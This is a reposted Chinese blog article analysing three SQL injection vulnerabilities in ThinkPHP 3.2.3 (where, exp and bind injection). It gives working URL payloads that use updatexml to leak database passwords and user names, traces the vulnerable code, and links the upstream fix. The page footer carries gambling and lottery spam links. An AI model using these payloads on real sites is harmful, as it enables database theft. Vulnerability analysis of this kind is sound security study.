安基网 首页 资讯 安全报 查看内容

ThinkPhp3漏洞原理分析总结

2020-5-4 14:03| 投稿: |来自:


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 前言ThinkPhp是目前主流的一款php语言框架,但在使用中,也是产生了很多的高危漏洞。本文小编将从Thinkphp3说起,说明一些tp3框架的漏洞产生原理。使广大爱好者进一步深刻的理解框架。环境搭建下载源码编辑器使用了phpstrom配置数据库添加测试数据Thinkphp3.2.3 where注入payload?id=1 and 1=updatexml ...

前言

ThinkPhp是目前主流的一款php语言框架,但在使用中,也是产生了很多的高危漏洞。本文小编将从Thinkphp3说起,说明一些tp3框架的漏洞产生原理。使广大爱好者进一步深刻的理解框架。


环境搭建

  • 下载源码

  • 编辑器使用了phpstrom

  • 配置数据库

  • 添加测试数据

Thinkphp3.2.3 where注入

  • payload
?id[where]=1 and 1=updatexml(1,concat(0x7e,(select password from users limit 1),0x7e),1)%23
  • 断点

分析

  • 经过htmlspecialchars过滤

  • 于442行通过think_filter函数进行过滤

  • 经过ThinkPHP/Library/Think/Model.class.php:779的find()方法

  • 满足条件则进入

  • 强制进行转换,转换为了int形

  • 带入查询

  • 步骤
id=1' -> I() -> find() -> __parseOptions() ->_parseType()

满足条件才能进去__parseOptions()方法

  • 条件
if (isset($options['where']) && is_array($options['where']) && !empty($fields) && !isset($options['join']))
  • 绕过
index.php?id[where]=3 and 1=1

修复

Thinkphp 3.2.3 exp注入

  • 部署环境

  • payload
http://localhost:8888/tp3/index.php?username[0]=exp&username[1]==1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)

分析

  • 进入Model.class.php的822行this>select(this>select(options)

  • 跟进select方法

  • 跟踪Driver.class.php中的parseSql方法

  • 跟踪Driver.class.php中的parseWhere方法

  • 经过whereStr.=whereStr.=this->parseWhereItem(this>parseKey(this>parseKey(key), $val)方法,跟踪进去
需要时数组才可以进去if语句

  • 语句exp直接拼接构成注入
 } elseif ('bind' == $exp) {
// 使用表达式
$whereStr .= $key . ' = :' . $val[1];

修复

使用I方法接受会通过think_filter函数进行过滤

thinkphp 3.2.3 bind注入

  • payload
index.php?id[0]=bind&id[1]=0 and updatexml(1,concat(0x7e,user(),0x7e),1)&password=1
  • 环境部署
    public function index()
{
$User = M("Users");
$user['id'] = I('id');
$data['password'] = I('password');
$valu = $User->where($user)->save($data);
var_dump($valu);
}

上文说到除了exp还有bind可以进行注入

  • 报错

  • 进入update方法

  • 进入到了parseWhereItem方法(bind可以注入)

  • 于函数bindParam进行了添加冒号

  • 在Driver.class.php文件execute中进行冒号替换
if (!empty($this->bind)) {
$that = $this;
$this->queryStr = strtr($this->queryStr, array_map(function ($val) use ($that) {return ''' . $that->escapeString($val) . ''';}, $this->bind));
}
  • 如果payload不是0的话

修复

https://github.com/top-think/thinkphp/commit/7e47e34af72996497c90c20bcfa3b2e1cedd7fa4



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6822467205058265603/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

相关阅读

最新评论

 最新
返回顶部
财神汇彩票计划群 极速赛车是谁开的 极速赛车冠军开奖计划 极速赛车是人为操控吗 状元彩票计划群 迪士尼彩票计划群 富贵彩票计划群 山东11选5计划 山东11选5计划 怎样注册极速赛车